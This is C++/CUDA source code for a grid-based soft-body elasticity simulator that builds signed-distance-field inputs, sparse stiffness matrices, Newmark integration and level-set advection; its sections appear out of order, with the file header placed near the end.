input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveNodes = 0; int numDiffusedNodes = 0; int numInactiveNodes = 0; input.posToIndex_ = std::make_shared<WorldGridData<int>>(input.grid_); input.posToIndex_->allocateHostMemory(); input.posToIndex_->getHostMemory().setConstant(noDiffusionLimit ? -1 : -diffusionDistance-1); //Loop: active cells -> active nodes for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (active) for (int i=0; i<8; ++i) input.posToIndex_->atHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) = 1; } //Loop: for the inactive nodes, compute the minimal distance to the next active node in the Manhattan norm if (!noDiffusionLimit) { for (int i = 0; i <= diffusionDistance; ++i) { for (int z = 0; z < size.z(); ++z) for (int y = 0; y < size.y(); ++y) for (int x = 0; x < size.x(); ++x) { int idx = input.posToIndex_->atHost(x, y, z); if (idx > 0) continue; //active if (x > 0) idx = ::max(idx, input.posToIndex_->atHost(x - 1, y, z) - 1); if (y > 0) idx = ::max(idx, input.posToIndex_->atHost(x, y - 1, z) - 1); if (z > 0) idx = ::max(idx, input.posToIndex_->atHost(x, y, z - 1) - 1); if (x < size.x() - 1) idx = ::max(idx, input.posToIndex_->atHost(x + 1, y, z) - 1); if (y < size.y() - 1) idx = ::max(idx, input.posToIndex_->atHost(x, y + 1, z) - 1); if (z < size.z() - 1) idx = ::max(idx, input.posToIndex_->atHost(x, y, z + 1) - 1); if (idx == 0) idx = -1; //neighbor to active input.posToIndex_->atHost(x, y, z) = idx; } } } //Loop: mapping std::vector<real3> referencePositions; for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { int idx = input.posToIndex_->getHost(x, y, z); if (idx > 0) { //active nodes, participates in the elasticity simulation numActiveNodes++; input.posToIndex_->atHost(x, y, z) = numActiveNodes; referencePositions.push_back( make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) )); } else if (idx <= -diffusionDistance - 1 && !noDiffusionLimit) { //too far outside, not needed in the diffusion numInactiveNodes++; input.posToIndex_->atHost(x, y, z) = 0; //input.referenceSdf_->atHost(x, y, z) = std::numeric_limits<real>::infinity(); } else { //participates in the diffusion numDiffusedNodes++; input.posToIndex_->atHost(x, y, z) = -numDiffusedNodes; } } input.posToIndex_->copyHostToDevice(); input.numActiveNodes_ = numActiveNodes; input.numDiffusedNodes_ = numDiffusedNodes; input.referencePositions_ = Vector3X(numActiveNodes); input.referencePositions_.copyFromHost(referencePositions.data()); input.referenceSdf_->copyHostToDevice(); CI_LOG_I("num active nodes: " << numActiveNodes << ", num diffused nodes: " << numDiffusedNodes << ", num inactive nodes: " << numInactiveNodes); } void SoftBodyGrid3D::setupInput4CellData(Input& input, bool enableDirichlet, real3 dirichletCenter, real3 dirichletHalfsize, bool integralsSampled) { const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveCells = 0; std::vector<char> dirichlet; std::vector<int4> mapping; std::vector<real8> volumeWeights; std::vector<real8> surfaceWeights; std::vector<real3> surfaceNormals; 
std::vector<real8> cellSdfs; real3 dirichletMin = dirichletCenter - dirichletHalfsize; real3 dirichletMax = dirichletCenter + dirichletHalfsize; input.hasDirichlet_ = false; real3 centerOfMass = make_real3(0, 0, 0); real totalVolume = 0; for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; numActiveCells++; //mapping int4 map = make_int4( input.posToIndex_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) - 1, input.posToIndex_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) - 1, input.posToIndex_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) - 1, input.posToIndex_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) - 1 ); mapping.push_back(map); assert(map.x + 2 == input.posToIndex_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) && "Invariant '+x follows -x' violated"); assert(map.y + 2 == input.posToIndex_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) && "Invariant '+x follows -x' violated"); assert(map.z + 2 == input.posToIndex_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) && "Invariant '+x follows -x' violated"); assert(map.w + 2 == input.posToIndex_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z) && "Invariant '+x follows -x' violated"); //interpolation weights Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = static_cast<real>(input.grid_->getVoxelSize()); Integration3D::InterpolationWeight_t wx = integralsSampled ? 
Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegralLinear(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; totalVolume += volume; assert(volume > 0); volumeWeights.push_back(wx); auto sx = Integration3D::surfaceIntegral(interpPhi, h); surfaceWeights.push_back(sx); assert(isfinite(wx.first.x)); assert(isfinite(wx.first.y)); assert(isfinite(wx.first.z)); assert(isfinite(wx.first.w)); assert(isfinite(wx.second.x)); assert(isfinite(wx.second.y)); assert(isfinite(wx.second.z)); assert(isfinite(wx.second.w)); assert(isfinite(sx.first.x)); assert(isfinite(sx.first.y)); assert(isfinite(sx.first.z)); assert(isfinite(sx.first.w)); assert(isfinite(sx.second.x)); assert(isfinite(sx.second.y)); assert(isfinite(sx.second.z)); assert(isfinite(sx.second.w)); //cell SDF values cellSdfs.push_back(interpPhi); //normal float3 normal = make_float3( (values[1]+values[3]+values[5]+values[7])/4 - (values[0]+values[2]+values[4]+values[6])/4, (values[2]+values[3]+values[6]+values[7])/4 - (values[0]+values[1]+values[4]+values[5])/4, (values[4]+values[5]+values[6]+values[7])/4 - (values[0]+values[1]+values[2]+values[3])/4 ); normal = safeNormalize(normal); surfaceNormals.push_back(make_real4(normal.x, normal.y, normal.z, 0)); //dirichlet if (enableDirichlet) { real3 cellMin = make_real3( (offset.x() + x - 1) / real(resolution), (offset.y() + y - 1) / real(resolution), (offset.z() + z - 1) / real(resolution) ); real3 cellMax = make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) ); bool isDirichlet = all(cellMax >= dirichletMin) && all(dirichletMax >= cellMin); dirichlet.push_back(isDirichlet); if (isDirichlet) input.hasDirichlet_ = true; } else dirichlet.push_back(false); //center of mass real weights[] = { wx.first.x, wx.first.y, wx.first.z, wx.first.w, wx.second.x, wx.second.y, wx.second.z, wx.second.w }; for (int i = 0; i < 8; ++i) centerOfMass += weights[i] * make_real3( (offset.x() + x + offsets[i].x) / real(resolution), (offset.y() + y + offsets[i].y) / real(resolution), (offset.z() + z + offsets[i].z) / real(resolution)); } input.numActiveCells_ = numActiveCells; input.mapping_ = Vector4Xi(numActiveCells); input.mapping_.copyFromHost(mapping.data()); input.dirichlet_ = VectorXc(numActiveCells); input.dirichlet_.copyFromHost(dirichlet.data()); input.interpolationVolumeWeights_ = Vector8X(numActiveCells); input.interpolationVolumeWeights_.copyFromHost(volumeWeights.data()); input.interpolationBoundaryWeights_ = Vector8X(numActiveCells); input.interpolationBoundaryWeights_.copyFromHost(surfaceWeights.data()); input.surfaceNormals_ = Vector3X(numActiveCells); input.surfaceNormals_.copyFromHost(surfaceNormals.data()); input.cellSdfs_ = Vector8X(numActiveCells); input.cellSdfs_.copyFromHost(cellSdfs.data()); input.centerOfMass_ = centerOfMass / totalVolume; //find index of free nodes that is closest to the center of mass std::vector<real3> referencePositions(input.referencePositions_.size()); input.referencePositions_.copyToHost(&referencePositions[0]); input.centerOfMassIndex_ = 0; float minCoMDistance = FLT_MAX; for (int i=0; i<referencePositions.size(); ++i) { float d = lengthSquared3(referencePositions[i] - input.centerOfMass_); if (d < minCoMDistance) { minCoMDistance = d; input.centerOfMassIndex_ = i; } } CI_LOG_I("num active cells: " << numActiveCells); CI_LOG_I("center of mass: (" << input.centerOfMass_.x << "," << 
input.centerOfMass_.y << "," << input.centerOfMass_.z << ")"); CI_LOG_I("total volume: " << totalVolume); } void SoftBodyGrid3D::setupInput5SparsityPattern(Input& input) { typedef cuMat::SparsityPattern<cuMat::CSR> SPattern; SPattern pattern; pattern.rows = input.numActiveNodes_; pattern.cols = input.numActiveNodes_; //create entry set typedef std::pair<int, int> entry_t; std::set<entry_t> entries; const auto& size = input.grid_->getSize(); for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; int indices[8]; for (int i=0; i<8; ++i) { indices[i] = input.posToIndex_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) - 1; assert(indices[i] >= 0); } for (int i=0; i<8; ++i) for (int j=0; j<8; ++j) entries.insert(std::make_pair(indices[i], indices[j])); } SMatrix3x3::StorageIndex nnz = static_cast<SMatrix3x3::StorageIndex>(entries.size()); pattern.nnz = nnz; //allocate indices on the host std::vector<SMatrix3x3::StorageIndex> JA(pattern.rows + 1, 0); //outer std::vector<SMatrix3x3::StorageIndex> IA; IA.reserve(nnz); //inner //loop through all sorted entries and build indices entry_t lastEntry(-1,-1); for (const entry_t& e : entries) { //assert sorted assert(lastEntry.first < e.first || (lastEntry.first==e.first && lastEntry.second<e.second)); lastEntry = e; //increment outer index, add inner index JA[lastEntry.first + 1]++; IA.push_back(lastEntry.second); } assert(IA.size() == nnz); for (int i=0; i<pattern.rows; ++i) JA[i+1] += JA[i]; //prefix sum //copy to device pattern.JA = SPattern::IndexVector(pattern.rows + 1); pattern.JA.copyFromHost(JA.data()); pattern.IA = SPattern::IndexVector(nnz); pattern.IA.copyFromHost(IA.data()); CI_LOG_I("Sparsity pattern created, matrix size: " << pattern.rows << ", non-zeros: " << nnz << " (" << (100.0*nnz / pattern.rows / pattern.rows) << "%, avg " << (real(nnz)/pattern.rows) << " per row)"); pattern.assertValid(); input.sparsityPattern_ = pattern; } SoftBodyGrid3D::Precomputed SoftBodyGrid3D::allocatePrecomputed(const Input& input) { Precomputed p; p.lumpedMass_ = VectorX(input.numActiveNodes_); p.lumpedMass_.setZero(); p.bodyForces_ = Vector3X(input.numActiveNodes_); p.bodyForces_.setZero(); return p; } SoftBodyGrid3D::State SoftBodyGrid3D::allocateState(const Input& input) { State s; s.displacements_ = Vector3X(input.numActiveNodes_); s.displacements_.setZero(); s.velocities_ = Vector3X(input.numActiveNodes_); s.velocities_.setZero(); const auto& size = input.grid_->getSize(); s.gridDisplacements_ = WorldGridData<real3>::DeviceArray_t(size.x(), size.y(), size.z()); return s; } SoftBodyGrid3D::Input SoftBodyGrid3D::createBar(const InputBarSettings& settings) { Input input; setupInput1Grid(input, settings.center, settings.halfsize, settings.resolution); std::function<real(real3)> posToSdf = [&settings](real3 pos) { real val = 0; if (all(pos >= settings.center - settings.halfsize) && all(pos <= settings.center + settings.halfsize)) { val = -1e10; val = ::max(val, settings.center.x - settings.halfsize.x - pos.x); val = ::max(val, pos.x - settings.center.x - settings.halfsize.x); val = ::max(val, settings.center.y - settings.halfsize.y - pos.y); val = ::max(val, pos.y - settings.center.y - settings.halfsize.y); val = ::max(val, settings.center.z - settings.halfsize.z - pos.z); val 
= ::max(val, pos.z - settings.center.z - settings.halfsize.z); } else { real3 closestPoint = clamp(pos, settings.center - settings.halfsize, settings.center + settings.halfsize); val = length(closestPoint - pos); } if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createTorus(const InputTorusSettings& settings) { Input input; real3 halfsize; real3 orientation = make_real3(settings.orientation.x, settings.orientation.y, settings.orientation.z); halfsize.x = sqrt(1 - ar::square(dot3(orientation, make_real3(1, 0, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.y = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 1, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.z = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 0, 1)))) * settings.outerRadius + settings.innerRadius; halfsize.w = 0; setupInput1Grid(input, settings.center, halfsize, settings.resolution); glm::vec3 a(0, 0, 1); glm::vec3 b(settings.orientation.x, settings.orientation.y, settings.orientation.z); glm::vec3 v = glm::cross(b, a); float angle = acos(glm::dot(b, a) / (glm::length(b) * glm::length(a))); glm::mat4 rotmat = glm::rotate(angle, v); std::function<real(real3)> posToSdf = [&settings, rotmat](real3 pos) { real val = 0; pos -= settings.center; //move towards the center glm::vec4 pos4(pos.x, pos.y, pos.z, 1); pos4 = rotmat * pos4; //rotate val = ar::square(sqrt(pos4.x*pos4.x + pos4.y*pos4.y) - settings.outerRadius) + pos4.z*pos4.z - ar::square(settings.innerRadius); val *= settings.resolution; if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromSdf(const InputSdfSettings & settings, WorldGridRealDataPtr referenceSdf) { Input input; input.grid_ = referenceSdf->getGrid(); input.referenceSdf_ = referenceSdf; for (size_t j = 0; j < input.referenceSdf_->getHostMemory().size(); ++j) { if (abs(input.referenceSdf_->getHostMemory()[j]) < settings.zeroCutoff) input.referenceSdf_->getHostMemory()[j] = 0; //This step is essential for stability } if (settings.filledCells) { WorldGridData<real>::HostArray_t copy = input.referenceSdf_->getHostMemory(); copy.setConstant(real(+1)); const auto size = input.referenceSdf_->getGrid()->getSize(); //mark complete grid cells for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { real values[8]; bool active = false; for (int i = 0; i < 8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; 
interpPhi.second.w = values[7]; real h = real(1); Integration3D::InterpolationWeight_t wx = settings.sampleIntegrals ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegral(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; if (volume > 0.5) { for (int i = 0; i < 8; ++i) copy[input.referenceSdf_->toLinear(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z)] = 0; } } //repair inner values for (int z = 1; z < size.z() - 1; ++z) for (int y = 1; y < size.y() - 1; ++y) for (int x = 1; x < size.x() - 1; ++x) { bool inner = true; for (int iz = z - 1; iz <= z + 1; ++iz) for (int iy = y - 1; iy <= y + 1; ++iy) for (int ix = x - 1; ix <= x + 1; ix++) { if (copy[input.referenceSdf_->toLinear(ix, iy, iz)] == +1) inner = false; } if (inner) { copy[input.referenceSdf_->toLinear(x, y, z)] = -1; } } input.referenceSdf_->getHostMemory() = copy; //Test / Validation for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { int numInside = 0; bool active = false; for (int i = 0; i < 8; ++i) { real val = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::insideEq(val)) numInside++; if (ar::utils::inside(val)) active = true; } if (numInside != 0 && numInside != 8 && active) { CI_LOG_E("If filledCells==true, each cell should be completely filled or completely empty, but the values are:" << " " << input.referenceSdf_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) << " " << input.referenceSdf_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) << " " << input.referenceSdf_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) << " " << input.referenceSdf_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) << " " << input.referenceSdf_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) << " " << input.referenceSdf_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) << " " << input.referenceSdf_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) << " " << input.referenceSdf_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z)); } } } input.referenceSdf_->copyHostToDevice(); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromFile(const InputSdfSettings & settings) { /* WorldGridPtr grid = std::make_shared<WorldGrid>(settings.voxelResolution, Eigen::Vector3i(settings.offset.x, settings.offset.y, settings.offset.z), Eigen::Vector3i(settings.size.x, settings.size.y, settings.size.z)); WorldGridRealDataPtr sdf = std::make_shared<WorldGridData<real>>(grid); sdf->allocateHostMemory(); std::ifstream i(settings.file, std::ios::in | std::ios::binary); i.seekg(sizeof(int) + 6 * sizeof(float)); std::vector<float> data(grid->getSize().prod()); i.read(reinterpret_cast<char*>(&data[0]), sizeof(float) * grid->getSize().prod()); i.close(); for (size_t j = 0; j < sdf->getHostMemory().size(); ++j) { sdf->getHostMemory()[j] = static_cast<real>(data[j]); } */ std::ifstream i(settings.file, std::ios::in | std::ios::binary); if (!i.is_open()) throw std::exception("Unable to open SDF file"); WorldGridRealDataPtr sdf = 
WorldGridData<real>::load(i); i.close(); return SoftBodyGrid3D::createFromSdf(settings, sdf); } //--------------------------------------------- // The actual instances: // They only store the settings for simple access // No logic is implemented here //--------------------------------------------- static int debugTimer = 0; SoftBodyGrid3D::SoftBodyGrid3D(const Input& input) : input_(input) , precomputed_(allocatePrecomputed(input)) , state_(allocateState(input)) { allocateTemporary(input); //fill statistics statistics_.numElements = input_.numActiveCells_; statistics_.numFreeNodes = input_.numActiveNodes_; statistics_.numEmptyNodes = input_.grid_->getSize().prod() - input_.numActiveNodes_; statistics_.avgEntriesPerRow = input_.sparsityPattern_.nnz / double(input_.sparsityPattern_.rows); reset(); } SoftBodyGrid3D::~SoftBodyGrid3D() { } void SoftBodyGrid3D::reset() { state_.displacements_.setZero(); state_.velocities_.setZero(); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); state_.advectedSDF_ = input_.referenceSdf_; state_.advectedBoundingBox_ = computeTransformedBoundingBox(input_, state_); state_.gridDisplacements_.setZero(); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); resetTimings(); debugTimer = 0; } void SoftBodyGrid3D::solve(bool dynamic, BackgroundWorker2* worker, bool advect) { resetTemporary(); CudaTimer timer; //1. Forces worker->setStatus("Grid: compute forces"); if (isRecordTimings()) timer.start(); forces_.inplace() = precomputed_.bodyForces_; if (settings_.enableCollision_) { applyCollisionForces(input_, settings_, state_, forces_); } if (isRecordTimings()) { timer.stop(); statistics_.collisionForcesTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; //2. stiffness matrix worker->setStatus("Grid: compute stiffness matrix"); if (isRecordTimings()) timer.start(); computeStiffnessMatrix(input_, state_, settings_, stiffness_, forces_); if (isRecordTimings()) { timer.stop(); statistics_.matrixAssembleTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; #if 0 //DEBUG Eigen::VectorXf forcesEigen = DebugUtils::vectorToEigen(forces_); Eigen::MatrixXf stiffnessEigen = DebugUtils::matrixToEigen(stiffness_); #if 1 cinder::app::console() << "Grid Force Vector:\n" << forcesEigen.transpose() << std::endl; //cinder::app::console() << "Grid Stiffness matrix:\n" << stiffnessEigen << std::endl; try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("StiffnessMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << stiffnessEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is stiffness matrix symmetric? " << (stiffnessEigen.isApprox(stiffnessEigen.transpose(), 1e-5))); int rank = stiffnessEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the stiffness matrix: " << rank << " of " << stiffnessEigen.rows()); if (rank < stiffnessEigen.rows()) { //check if there are empty rows / columns for (int i=0; i<stiffnessEigen.rows(); ++i) { if (stiffnessEigen.row(i).isZero(1e-5)) { CI_LOG_I("Row " << i << " is zero"); } } } #endif //3. 
Solve if (dynamic) { worker->setStatus("Grid: Newmark compute matrices"); CommonKernels::newmarkTimeIntegration( stiffness_, forces_, precomputed_.lumpedMass_, state_.displacements_, state_.velocities_, settings_.dampingAlpha_, settings_.dampingBeta_, settings_.timestep_, newmarkA_, newmarkB_, settings_.newmarkTheta_); #if 0 //DEBUG Eigen::VectorXf massEigen(input_.numActiveNodes_); precomputed_.lumpedMass_.copyToHost(massEigen.data()); Eigen::MatrixXf newmarkAEigen = DebugUtils::matrixToEigen(newmarkA_); Eigen::VectorXf newmarkBEigen = DebugUtils::vectorToEigen(newmarkB_); #if 1 try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("MassVector.dat", std::ofstream::out | std::ofstream::trunc); f << massEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkAEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkVector.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkBEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is the Newmark matrix symmetric? " << (newmarkAEigen.isApprox(newmarkAEigen.transpose(), 1e-5))); int rank = newmarkAEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the Newmark matrix: " << rank << " of " << newmarkAEigen.rows()); #endif //Testing #if MAKE_NEWMARK_SYMMETRIC==1 newmarkA_ = DebugUtils::makeSymmetric(newmarkA_); #endif worker->setStatus("Grid: CG solve"); Vector3X currentDisplacement = state_.displacements_ + make_real3(settings_.timestep_) * state_.velocities_; //initial guess int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(newmarkA_, newmarkB_, currentDisplacement, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } //Testing if (settings_.debugSaveMatrices_) { CI_LOG_E("save matrices"); DebugUtils::saveToMatlab(newmarkA_, "NewmarkA_" + std::to_string(debugTimer) + ".dat"); DebugUtils::saveToMatlab(newmarkB_, "NewmarkB_" + std::to_string(debugTimer) + ".dat"); } debugTimer++; worker->setStatus("Grid: Newmark compute velocity"); Vector3X currentVelocity(input_.numActiveNodes_); CommonKernels::newmarkComputeVelocity( state_.displacements_, state_.velocities_, currentDisplacement, currentVelocity, settings_.timestep_, settings_.newmarkTheta_); state_.displacements_.inplace() = currentDisplacement; state_.velocities_.inplace() = currentVelocity; } else { worker->setStatus("Grid: CG solve"); state_.displacements_.setZero(); int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(stiffness_, forces_, state_.displacements_, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } } #if 0 //DEBUG Eigen::VectorXf displacementsEigen = DebugUtils::vectorToEigen(state_.displacements_); 
cinder::app::console() << "Grid Solution Displacements:\n" << displacementsEigen.transpose() << std::endl; Eigen::VectorXf velocitiesEigen = DebugUtils::vectorToEigen(state_.velocities_); cinder::app::console() << "Grid Solution Velocities:\n" << velocitiesEigen.transpose() << std::endl; #endif if (advect) { //4. Advect the levelset //a) compute new bounding box and grid worker->setStatus("Grid: Compute new bounding box"); if (isRecordTimings()) timer.start(); auto newBox = computeTransformedBoundingBox(input_, state_); state_.advectedBoundingBox_ = limitBoundingBox(newBox, state_.advectedBoundingBox_); WorldGridPtr grid = createGridFromBoundingBox(state_.advectedBoundingBox_, input_.grid_->getVoxelResolution(), 3); if (isRecordTimings()) { timer.stop(); statistics_.gridBoundingBoxTime.push_back(timer.duration()); } //b) Diffuse displacements worker->setStatus("Grid: Diffuse Displacements"); if (isRecordTimings()) timer.start(); diffuseDisplacements(input_, state_, state_.gridDisplacements_, diffusionTmp1_, diffusionTmp2_); if (isRecordTimings()) { timer.stop(); statistics_.gridDiffusionTime.push_back(timer.duration()); } //c) Advect levelset worker->setStatus("Grid: Advect Levelset"); auto advectedSdf = std::make_shared<WorldGridData<real>>(grid); advectedSdf->allocateDeviceMemory(); if (isRecordTimings()) timer.start(); advectLevelset(input_, state_.gridDisplacements_, advectedSdf, AdvectionSettings()); if (isRecordTimings()) { timer.stop(); statistics_.gridAdvectionTime.push_back(timer.duration()); } state_.advectedSDF_ = advectedSdf; } worker->setStatus("Grid: done"); } void SoftBodyGrid3D::updateSettings() { precomputed_.bodyForces_.setZero(); precomputed_.lumpedMass_.setZero(); computeMassMatrix(input_, settings_, precomputed_.lumpedMass_); computeBodyForces(input_, settings_, precomputed_.bodyForces_); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); CI_LOG_I("Settings updated, mass matrix and body forces recomputed"); } void SoftBodyGrid3D::allocateTemporary(const Input& input) { forces_ = Vector3X(input.numActiveNodes_); stiffness_ = SMatrix3x3(input.sparsityPattern_); newmarkA_ = SMatrix3x3(input.sparsityPattern_); newmarkB_ = Vector3X(input.numActiveNodes_); const Eigen::Vector3i& size = input.grid_->getSize(); diffusionTmp1_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp2_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); } void SoftBodyGrid3D::resetTemporary() { forces_.setZero(); stiffness_.setZero(); } }
SoftBodyGrid3D.cu
#include "SoftBodyGrid3D.h" #include <cinder/app/AppBase.h> #include <cinder/CinderGlm.h> #include <Eigen/Dense> #include "Utils.h" #include "Integration3D.h" #include "CommonKernels.h" #include "DebugUtils.h" #include "CudaTimer.h" //For testing: set to 1 to enforce a symmetric matrix in the CG //If 0, small unsymmetries of a few ulps are in the matrix due to the ordering of the operations //If 1, the upper and lower triangular parts are averaged to create a numerically exact symmetric matrix #define MAKE_NEWMARK_SYMMETRIC 0 namespace ar3d { int3 SoftBodyGrid3D::offsets[8] = { make_int3(-1, -1, -1), make_int3(0, -1, -1), make_int3(-1, 0, -1), make_int3(0, 0, -1), make_int3(-1, -1, 0), make_int3(0, -1, 0), make_int3(-1, 0, 0), make_int3(0, 0, 0) }; void SoftBodyGrid3D::Input::assertSizes() const { assert(referenceSdf_->getGrid() == grid_); assert(posToIndex_->getGrid() == grid_); assert(numActiveCells_ > 0); assert(numActiveNodes_ > 0); assert(interpolationVolumeWeights_.rows() == numActiveCells_); assert(interpolationBoundaryWeights_.rows() == numActiveCells_); assert(surfaceNormals_.rows() == numActiveCells_); assert(dirichlet_.rows() == numActiveCells_); assert(mapping_.rows() == numActiveCells_); assert(referencePositions_.rows() == numActiveNodes_); //assert(sparsityPattern_.cols == numActiveNodes_); //assert(sparsityPattern_.rows == numActiveNodes_); } SoftBodyGrid3D::State SoftBodyGrid3D::State::deepClone() const { State s; s.displacements_ = displacements_.deepClone(); s.velocities_ = velocities_.deepClone(); s.advectedBoundingBox_ = advectedBoundingBox_; s.gridDisplacements_ = gridDisplacements_.deepClone(); if (advectedSDF_) { s.advectedSDF_ = std::make_shared<WorldGridData<real>>(advectedSDF_->getGrid()); s.advectedSDF_->setDeviceMemory(advectedSDF_->getDeviceMemory().deepClone()); } return s; } WorldGridPtr 